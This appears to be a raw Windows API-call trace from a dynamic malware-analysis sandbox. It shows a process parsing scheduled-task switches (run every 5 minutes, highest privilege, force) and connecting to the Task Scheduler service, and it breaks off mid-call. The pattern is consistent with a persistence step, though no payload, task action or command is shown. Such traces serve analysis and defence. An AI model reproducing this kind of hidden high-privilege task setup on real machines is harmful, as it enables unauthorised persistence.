[0172.578] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.578] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|u|") returned 3 [0172.578] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.578] lstrlenW (lpString="|u|") returned 3 [0172.578] lstrlenW (lpString="|F|") returned 3 [0172.578] StrStrIW (lpFirst="|u|", lpSrch="|F|") returned 0x0 [0172.578] SetLastError (dwErrCode=0x490) [0172.578] lstrlenW (lpString="p") returned 1 [0172.578] lstrlenW (lpString="p") returned 1 [0172.578] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.578] lstrlenW (lpString="F") returned 1 [0172.578] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.578] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|p|") returned 3 [0172.578] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.578] lstrlenW (lpString="|p|") returned 3 [0172.578] lstrlenW (lpString="|F|") returned 3 [0172.578] StrStrIW (lpFirst="|p|", lpSrch="|F|") returned 0x0 [0172.578] SetLastError (dwErrCode=0x490) [0172.578] lstrlenW (lpString="ru") returned 2 [0172.578] lstrlenW (lpString="ru") returned 2 [0172.578] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.579] lstrlenW (lpString="F") returned 1 [0172.579] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.579] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ru|") returned 4 [0172.579] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.579] lstrlenW (lpString="|ru|") returned 4 [0172.579] lstrlenW (lpString="|F|") returned 3 [0172.579] StrStrIW (lpFirst="|ru|", lpSrch="|F|") returned 0x0 [0172.579] SetLastError (dwErrCode=0x490) [0172.579] lstrlenW (lpString="rp") returned 2 [0172.579] lstrlenW (lpString="rp") returned 2 [0172.579] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.579] lstrlenW (lpString="F") returned 1 [0172.579] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.579] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|rp|") returned 4 [0172.579] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.579] lstrlenW (lpString="|rp|") returned 4 [0172.579] lstrlenW (lpString="|F|") returned 3 [0172.579] StrStrIW (lpFirst="|rp|", lpSrch="|F|") returned 0x0 [0172.579] SetLastError (dwErrCode=0x490) [0172.579] lstrlenW (lpString="sc") returned 2 [0172.579] lstrlenW (lpString="sc") returned 2 [0172.579] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.580] lstrlenW (lpString="F") returned 1 [0172.580] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.580] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.580] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.580] lstrlenW (lpString="|sc|") returned 4 [0172.580] lstrlenW (lpString="|F|") returned 3 [0172.580] StrStrIW (lpFirst="|sc|", lpSrch="|F|") returned 0x0 [0172.580] SetLastError (dwErrCode=0x490) [0172.580] lstrlenW (lpString="mo") returned 2 [0172.580] lstrlenW (lpString="mo") returned 2 [0172.580] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.580] lstrlenW (lpString="F") returned 1 [0172.580] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.580] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.580] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.580] lstrlenW (lpString="|mo|") returned 4 [0172.580] lstrlenW (lpString="|F|") returned 3 [0172.580] StrStrIW (lpFirst="|mo|", lpSrch="|F|") returned 0x0 [0172.580] SetLastError (dwErrCode=0x490) [0172.658] lstrlenW (lpString="d") returned 1 [0172.658] lstrlenW (lpString="d") returned 1 [0172.658] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.658] lstrlenW (lpString="F") returned 1 [0172.658] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.658] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|d|") returned 3 [0172.659] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.659] lstrlenW (lpString="|d|") returned 3 [0172.659] lstrlenW (lpString="|F|") returned 3 [0172.659] StrStrIW (lpFirst="|d|", lpSrch="|F|") returned 0x0 [0172.659] SetLastError (dwErrCode=0x490) [0172.659] lstrlenW (lpString="m") returned 1 [0172.659] lstrlenW (lpString="m") returned 1 [0172.659] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.659] lstrlenW (lpString="F") returned 1 [0172.659] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.659] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|m|") returned 3 [0172.659] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.659] lstrlenW (lpString="|m|") returned 3 [0172.659] lstrlenW (lpString="|F|") returned 3 [0172.659] StrStrIW (lpFirst="|m|", lpSrch="|F|") returned 0x0 [0172.659] SetLastError (dwErrCode=0x490) [0172.659] lstrlenW (lpString="i") returned 1 [0172.659] lstrlenW (lpString="i") returned 1 [0172.659] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.662] lstrlenW (lpString="F") returned 1 [0172.662] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.662] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|i|") returned 3 [0172.662] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.662] lstrlenW (lpString="|i|") returned 3 [0172.662] lstrlenW (lpString="|F|") returned 3 [0172.662] StrStrIW (lpFirst="|i|", lpSrch="|F|") returned 0x0 [0172.662] SetLastError (dwErrCode=0x490) [0172.662] lstrlenW (lpString="tn") returned 2 [0172.662] lstrlenW (lpString="tn") returned 2 [0172.662] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.662] lstrlenW (lpString="F") returned 1 [0172.663] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.663] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.663] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.663] lstrlenW (lpString="|tn|") returned 4 [0172.663] lstrlenW (lpString="|F|") returned 3 [0172.663] StrStrIW (lpFirst="|tn|", lpSrch="|F|") returned 0x0 [0172.663] SetLastError (dwErrCode=0x490) [0172.663] lstrlenW (lpString="tr") returned 2 [0172.663] lstrlenW (lpString="tr") returned 2 [0172.663] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.663] lstrlenW (lpString="F") returned 1 [0172.663] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.663] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.663] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.663] lstrlenW (lpString="|tr|") returned 4 [0172.663] lstrlenW (lpString="|F|") returned 3 [0172.663] StrStrIW (lpFirst="|tr|", lpSrch="|F|") returned 0x0 [0172.663] SetLastError (dwErrCode=0x490) [0172.663] lstrlenW (lpString="st") returned 2 [0172.663] lstrlenW (lpString="st") returned 2 [0172.663] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.663] lstrlenW (lpString="F") returned 1 [0172.663] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.663] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|st|") returned 4 [0172.664] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.664] lstrlenW (lpString="|st|") returned 4 [0172.664] lstrlenW (lpString="|F|") returned 3 [0172.664] StrStrIW (lpFirst="|st|", lpSrch="|F|") returned 0x0 [0172.664] SetLastError (dwErrCode=0x490) [0172.664] lstrlenW (lpString="sd") returned 2 [0172.664] lstrlenW (lpString="sd") returned 2 [0172.664] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.664] lstrlenW (lpString="F") returned 1 [0172.664] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.664] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sd|") returned 4 [0172.664] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.664] lstrlenW (lpString="|sd|") returned 4 [0172.664] lstrlenW (lpString="|F|") returned 3 [0172.664] StrStrIW (lpFirst="|sd|", lpSrch="|F|") returned 0x0 [0172.664] SetLastError (dwErrCode=0x490) [0172.664] lstrlenW (lpString="ed") returned 2 [0172.664] lstrlenW (lpString="ed") returned 2 [0172.664] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.664] lstrlenW (lpString="F") returned 1 [0172.664] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.664] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ed|") returned 4 [0172.664] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.664] lstrlenW (lpString="|ed|") returned 4 [0172.665] lstrlenW (lpString="|F|") returned 3 [0172.665] StrStrIW (lpFirst="|ed|", lpSrch="|F|") returned 0x0 [0172.665] SetLastError (dwErrCode=0x490) [0172.665] lstrlenW (lpString="it") returned 2 [0172.665] lstrlenW (lpString="it") returned 2 [0172.665] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.665] lstrlenW (lpString="F") returned 1 [0172.665] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.665] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|it|") returned 4 [0172.665] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.665] lstrlenW (lpString="|it|") returned 4 [0172.665] lstrlenW (lpString="|F|") returned 3 [0172.665] StrStrIW (lpFirst="|it|", lpSrch="|F|") returned 0x0 [0172.665] SetLastError (dwErrCode=0x490) [0172.665] lstrlenW (lpString="et") returned 2 [0172.665] lstrlenW (lpString="et") returned 2 [0172.665] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.665] lstrlenW (lpString="F") returned 1 [0172.665] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.665] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|et|") returned 4 [0172.665] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.665] lstrlenW (lpString="|et|") returned 4 [0172.665] lstrlenW (lpString="|F|") returned 3 [0172.666] StrStrIW (lpFirst="|et|", lpSrch="|F|") returned 0x0 [0172.666] SetLastError (dwErrCode=0x490) [0172.666] lstrlenW (lpString="k") returned 1 [0172.666] lstrlenW (lpString="k") returned 1 [0172.666] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.666] lstrlenW (lpString="F") returned 1 [0172.666] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.666] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|k|") returned 3 [0172.666] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.666] lstrlenW (lpString="|k|") returned 3 [0172.666] lstrlenW (lpString="|F|") returned 3 [0172.666] StrStrIW (lpFirst="|k|", lpSrch="|F|") returned 0x0 [0172.666] SetLastError (dwErrCode=0x490) [0172.666] lstrlenW (lpString="du") returned 2 [0172.666] lstrlenW (lpString="du") returned 2 [0172.666] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.666] lstrlenW (lpString="F") returned 1 [0172.666] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.666] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|du|") returned 4 [0172.666] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.666] lstrlenW (lpString="|du|") returned 4 [0172.666] lstrlenW (lpString="|F|") returned 3 [0172.666] StrStrIW (lpFirst="|du|", lpSrch="|F|") returned 0x0 [0172.666] SetLastError (dwErrCode=0x490) [0172.666] lstrlenW (lpString="ri") returned 2 [0172.667] lstrlenW (lpString="ri") returned 2 [0172.667] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.667] lstrlenW (lpString="F") returned 1 [0172.667] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.667] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ri|") returned 4 [0172.667] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.667] lstrlenW (lpString="|ri|") returned 4 [0172.667] lstrlenW (lpString="|F|") returned 3 [0172.667] StrStrIW (lpFirst="|ri|", lpSrch="|F|") returned 0x0 [0172.667] SetLastError (dwErrCode=0x490) [0172.667] lstrlenW (lpString="z") returned 1 [0172.667] lstrlenW (lpString="z") returned 1 [0172.667] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.667] lstrlenW (lpString="F") returned 1 [0172.667] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.667] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|z|") returned 3 [0172.667] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.667] lstrlenW (lpString="|z|") returned 3 [0172.667] lstrlenW (lpString="|F|") returned 3 [0172.667] StrStrIW (lpFirst="|z|", lpSrch="|F|") returned 0x0 [0172.667] SetLastError (dwErrCode=0x490) [0172.667] lstrlenW (lpString="f") returned 1 [0172.668] lstrlenW (lpString="f") returned 1 [0172.668] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.668] lstrlenW (lpString="F") returned 1 [0172.668] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.668] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|f|") returned 3 [0172.668] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|F|") returned 3 [0172.668] lstrlenW (lpString="|f|") returned 3 [0172.668] lstrlenW (lpString="|F|") returned 3 [0172.668] StrStrIW (lpFirst="|f|", lpSrch="|F|") returned="|f|" [0172.668] SetLastError (dwErrCode=0x0) [0172.668] SetLastError (dwErrCode=0x0) [0172.668] GetProcessHeap () returned 0x9c0000 [0172.668] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5530 [0172.668] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.668] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0172.669] lstrlenW (lpString="LIMITED") returned 7 [0172.669] GetProcessHeap () returned 0x9c0000 [0172.669] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4e58 [0172.669] GetThreadLocale () returned 0x409 [0172.669] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0172.669] GetProcessHeap () returned 0x9c0000 [0172.669] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5510 [0172.669] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.669] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0172.669] lstrlenW (lpString="HIGHEST") returned 7 [0172.669] GetProcessHeap () returned 0x9c0000 [0172.669] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4de0 [0172.669] GetThreadLocale () returned 0x409 [0172.669] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0172.669] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.670] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0172.670] lstrlenW (lpString="MINUTE") returned 6 [0172.670] GetProcessHeap () returned 0x9c0000 [0172.670] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xe) returned 0x9d4e88 [0172.670] GetThreadLocale () returned 0x409 [0172.670] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="minute", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 2 [0172.670] SetLastError (dwErrCode=0x0) [0172.670] GetProcessHeap () returned 0x9c0000 [0172.670] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x1fc) returned 0x9d6b30 [0172.670] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.670] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0172.670] lstrlenW (lpString="First") returned 5 [0172.670] GetProcessHeap () returned 0x9c0000 [0172.670] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xc) returned 0x9d4ea0 [0172.671] GetProcessHeap () returned 0x9c0000 [0172.671] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d54b0 [0172.671] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.671] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0172.671] lstrlenW (lpString="Second") returned 6 [0172.671] GetProcessHeap () returned 0x9c0000 [0172.671] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xe) returned 0x9d4eb8 [0172.671] GetProcessHeap () returned 0x9c0000 [0172.671] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5490 [0172.671] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.671] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0172.671] lstrlenW (lpString="Third") returned 5 [0172.671] GetProcessHeap () returned 0x9c0000 [0172.671] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xc) returned 0x9d4ed0 [0172.671] GetProcessHeap () returned 0x9c0000 [0172.671] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5470 [0172.671] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.672] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0172.672] lstrlenW (lpString="Fourth") returned 6 [0172.672] GetProcessHeap () returned 0x9c0000 [0172.672] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xe) returned 0x9d4ee8 [0172.672] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.672] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0172.672] lstrlenW (lpString="Last") returned 4 [0172.672] GetProcessHeap () returned 0x9c0000 [0172.672] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xa) returned 0x9d4f00 [0172.672] lstrlenW (lpString="5") returned 1 [0172.672] _wtol (_String="5") returned 5 [0173.298] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0173.311] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0173.311] lstrlenW (lpString="First") returned 5 [0173.311] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0173.311] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0173.311] lstrlenW (lpString="Second") returned 6 [0173.311] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0173.311] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0173.312] lstrlenW (lpString="Third") returned 5 [0173.312] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0173.312] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0173.312] lstrlenW (lpString="Fourth") returned 6 [0173.312] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0173.312] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0173.312] lstrlenW (lpString="Last") returned 4 [0173.312] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x2dce60, cchData=128 | out: lpLCData="0") returned 2 [0173.312] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0173.312] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0173.312] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0173.312] GetProcessHeap () returned 0x9c0000 [0173.312] GetProcessHeap () returned 0x9c0000 [0173.312] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4ea0) returned 1 [0173.312] GetProcessHeap () returned 0x9c0000 [0173.312] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d4ea0) returned 0xc [0173.313] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x2dce68, cchData=128 | out: lpLCData="0") returned 2 [0173.313] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0173.313] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0173.313] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0173.313] GetProcessHeap () returned 0x9c0000 [0173.313] GetProcessHeap () returned 0x9c0000 [0173.313] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4eb8) returned 1 [0173.313] GetProcessHeap () returned 0x9c0000 [0173.313] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d4eb8) returned 0xe [0173.313] lstrlenW (lpString="") returned 0 [0173.313] GetLocalTime (in: lpSystemTime=0x2dd434 | out: lpSystemTime=0x2dd434*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2e, wSecond=0x21, wMilliseconds=0x328)) [0173.313] lstrlenW (lpString="") returned 0 [0173.313] lstrlenW (lpString="") returned 0 [0173.314] lstrlenW (lpString="") returned 0 [0173.314] lstrlenW (lpString="") returned 0 [0173.314] lstrlenW (lpString="5") returned 1 [0173.314] _wtol (_String="5") returned 5 [0173.314] lstrlenW (lpString="") returned 0 [0173.314] lstrlenW (lpString="") returned 0 [0173.314] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0173.792] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0176.330] CoCreateInstance (in: rclsid=0x7c230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7c20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x2dd3ec | out: ppv=0x2dd3ec*=0x493e68) returned 0x0 [0178.027] TaskScheduler:ITaskService:Connect (This=0x493e68, serverName=0x2dd35c*(varType=0x8, wReserved1=0x2e53, wReserved2=0xd3f0, wReserved3=0x2d, varVal1=0x0, varVal2=0x2dd3d4), user=0x2dd36c*(varType=0x0, wReserved1=0x76c1, 